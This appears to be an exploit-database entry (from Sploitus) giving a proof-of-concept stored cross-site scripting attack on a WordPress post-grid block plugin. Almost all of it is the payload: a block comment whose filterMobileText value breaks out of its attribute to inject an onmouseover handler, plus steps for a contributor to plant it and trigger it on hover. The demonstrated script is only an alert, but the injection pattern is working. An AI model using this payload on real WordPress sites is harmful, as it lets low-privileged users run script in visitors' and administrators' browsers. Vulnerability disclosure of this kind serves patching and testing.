Share
## https://sploitus.com/exploit?id=WPEX-ID:635BE98D-4C17-4E75-871F-9794D85A2EB1
As a contributor, put the below code in a post while in Code Editor mode

<!-- wp:ultimate-post/post-grid-3 {"blockId":"d57ca5","currentPostId":"2198","filterShow":true,"paginationShow":true,"readMore":true,"contentTag":"section","openInTab":true,"headingText":"123","headingURL":"123","headingTag":"h5","titleTag":"h6","metaMinText":"123","metaAuthorPrefix":"123","fallbackImg":{"url":"123","id":99999},"readMoreText":"123","filterText":"ClickMe!","filterMobileText":"\u0022onmouseover='alert(/XSS/)'","loadMoreText":"123"} /-->

The XSS will be triggered when (pre)viewing the post and moving the mouse over the ClickMe! text